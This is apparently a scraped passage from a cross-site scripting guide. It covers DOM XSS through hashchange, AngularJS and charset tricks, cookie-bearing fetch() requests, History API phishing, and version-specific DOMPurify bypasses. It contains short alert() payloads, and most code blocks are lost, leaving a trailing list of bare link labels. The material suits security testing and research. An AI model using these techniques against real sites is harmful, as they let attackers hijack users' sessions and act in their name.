Here the location.hash source is put into the vulnerable sink, which is exploitable with a simple #<img src onerror=alert()> payload. In the snippet, this is called on the event it is not yet triggered on page load, but only after the hash has changed. In order to exploit this, we need to load the page normally first, and then after some time when the page has loaded we can replace the URL of the active window which will act as a "change". Note that reading a location is not allowed cross-origin, but writing a new location is, so we can abuse this.

Otherwise, you can still load and change a URL by open()'ing it in a new window, waiting some time, and then changing the location of the window you held on to (note that the method requires user interaction like an onclick= handler to be triggered):

When this is enabled, however, many possibilities open up. One of the most interesting is template injection using {{ characters inside a text string, no HTML tags are needed here! This is a rather well-known technique though, so it may be blocked. In cases of HTML injection with strong filters, you may be able to add custom attributes bypassing filters like . See for some AngularJS tricks that managed to bypass Teams' filters.

You may still be able to exploit this by slowing down the AngularJS script loading by filling up the browser's connection pool. .

Note: It is not possible to abuse JIS X 0201 1978 or JIS X 0201 1983 (2 bytes per char) encoding to write arbitrary ASCII characters instead of Unicode garbage. Only some Japanese characters and ASCII full-width alternatives can be created (), except for two unique cases that can generate a $ and ( character found using this fuzzer:

The missing charset behavior may be common in file uploads, and URLs which are created by explicitly writing a content type in JavaScript. Developers often forget the charset:

The Cross-Site in XSS means that it should be exploitable from another malicious site, which can then perform actions on the victim's behalf on the target site. It is always a good idea to test exploits locally first with a simple web server like php -S 0.0.0.0:8000, and when you need to exploit something remotely it can be hosted temporarily with a tool like , or permanently with a web server of your own.

Note that might be needed on parameters to make sure special characters are not part of the URL, or to simply obfuscate the payload

When making a fetch() request to the same domain you are on, cookies are included, even if httpOnly is set. This opens up many possibilities by requesting data and performing actions on the application. When making a request, the response is also readable because of the , as we are on the same site as the request is going to.

Performing actions on the victim's behalf can is also common and can result in a high impact, depending on their capabilities. These are often done using POST requests and may contain extra data or special headers. Luckily, allows us to do all that and more! Its second argument contains options with keys like method:, headers:, and body: just to name a few:

Some of the mentioned phishing tricks can be improved with XSS by rewriting the URL shown in the address bar. This is possible with the , to show the user an expected /login or something:

The 2nd case is very hard to protect securely. First, because many tags have unexpected abilities, like the <a href=javascript:alert()> protocol. If posting links is allowed, they need to think about preventing the javascript: protocol specifically and allowing regular https:// links. There exist a ton of different tags and attributes that can execute JavaScript (see the ) making a blocklist almost infeasible, and an allowlist should be used. The second reason this is hard is because browsers are weird, like really weird. The contains a lot of rules and edge cases a filter should handle. If a filter parses a specially crafted payload differently from a browser, the malicious data might go unnoticed and end up executing in the victim's browser.

In fact, we can even go one step further and use the global name variable which is controllable by an attacker. So global, that it persists between navigations. When a victim visits our site like in an XSS scenario, we can set the name variable to any payload we like and redirect to the vulnerable page to trigger it (see for more info and explanation):

Let's take the following example: The sanitizer is used to filter out malicious content that could trigger JavaScript execution, which it does perfectly on the following string:

showed another interesting exploitable scenario, where your input is placed inside an <svg> tag after sanitization:

While the abovementioned tricks can get around specific situations, an outdated version of the library can cause every output to be vulnerable by completely bypassing DOMPurify in a regular context. The latest vulnerable version is 3.1.2, with the following two articles explaining in detail how the recent techniques work:

The latest vulnerable older version 2 is 2.2.3 with a complete bypass found by in dec. 2020. The following payload will trigger alert(origin) when sanitized and put into any regular part of the DOM:

Easy-to-follow Google Search mXSS:

Finding a custom variation of an outdated DOMPurify bypass specific to Swagger UI:

note: for unique versions below 3 (2.X.X), you don't need mXSS:

More complex Universal mXSS:

🌐
(B
(J
$@
$B
JavaScript
CyberChef
this domain
this introduction
improved version using @import
this tool
PortSwigger XSS Cheat Sheet
spec
source
another example
URLSearchParams
postMessage()
source
hashchange
open()
AngularJS
DOMPurify
this presentation by Masato Kinugawa
See this challenge writeup for details
VueJS
HTMX
source
https://shazzer.co.uk/vectors/66efda1eacb1e3c22aff755c
https://gist.github.com/kevin-mizu/9b24a66f9cb20df6bbc25cc68faf3d71
Blob
ngrok
URL Encoding
Same-Origin Policy
fetch()
HTML Injection
History API
Cheat Sheet
HTML Specification
Content-Security-Policy (CSP)
this video
DOMPurify
@kevin_mizu
dompurify
@TheGrandPew
<= 3.1.2 - Kevin Mizu & RyotaK
<= 3.1.1 - Kevin Mizu
<= 3.1.0 - IcesFont
< 2.2.4 - TheGrandPew
< 2.2.3 - TheGrandPew
< 2.2.2 - Daniel Santos
< 2.1 - Gareth Heyes
< 2.0.17 - Michał Bentkowski
https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/
https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers
https://gist.github.com/JorianWoltjer/33e28f871652ac9e97086148ed965b54
https://twitter.com/garethheyes/status/1723047393279586682
LogoHome · wisec/domxsswiki WikiGitHub
Big and up-to-date collection of DOM XSS sources, sinks and techniques
LogoDOM based AngularJS sandbox escapesPortSwigger Research
Escape different AngularJS version sandboxes
LogoEvading defences using VueJS script gadgetsPortSwigger Research
Detailed research into VueJS payloads and filter bypasses
LogoEncoding Differentials: Why Charset MattersSonarSource
Source explaining XSS tricks when a charset definition is missing from a response, abusing ISO-2022-JP
LogoCross-Site Scripting (XSS) Cheat Sheet - 2022 Edition | Web Security AcademyWebSecAcademy
Filterable list of almost every imaginable HTML that can trigger JavaScript
LogoXSS-Payloads/Without-Parentheses.md at master · RenwaX23/XSS-PayloadsGitHub
More tricks to run arbitrary JavaScript without paratheses to bypass filters
LogoPost: Mutation XSS: Explained, CVE and Challenge | Jorian Woltjerjorianwoltjer.com
Explanation of mXSS, CVE-2024-52595 and some advanced techniques
LogoExploring the DOMPurify library: Hunting for Misconfigurations (2/2). Tags:Article - Article - Web - mXSSmizu.re
Common misconfigurations in various later versions
here
LogoExploring the DOMPurify library: Bypasses and Fixes (1/2). Tags:Article - Article - Web - mXSSmizu.re
Bypasses of versions 3.1.0-3.1.2 using node flattening (credits to )
Changelog of DOMPurify mentioning partial bypasses on specific versions
@IcesFont
LogoReleases · cure53/DOMPurifyGitHub
LogomXSS cheatsheet
Mutation XSS cheatsheet containing many unique element behaviors useful for bypassing filters
LogoDom-Explorer
Test HTML parsing/sanitization with great visualization and sharing capabilities
4KB
domxss-trigger-table.html
Source code for script used to generate and test the results in the table above
Table of XSS payloads and DOM sinks that trigger them (yellow = Chrome but not Firefox)
Table showing mapping from byte to character in JIS X 0201 1976
1. Input in HTML (search) and JavaScript string (lang) escaped correctly
2. Bypass using JIS X 0201 1976 escape sequence in search, ignoring backslashes and escaping with quote
In markdown, our image alt text ends up in the <img alt= attribute
Writing the JIS X 0201 1978 escape sequence obfuscates the succeeding characters
Text in markdown ends obfuscation using ASCII escape sequence, continuing the attribute
Later image tag still part of the exploited attribute, only closed after trying to open first attribute
Adding malicious attribute after context confusion creates successful XSS payload
XSS mutation points with possible special characters ()
Example from showing the difference between the browser and DOMPurify
source
mizu.re's writeup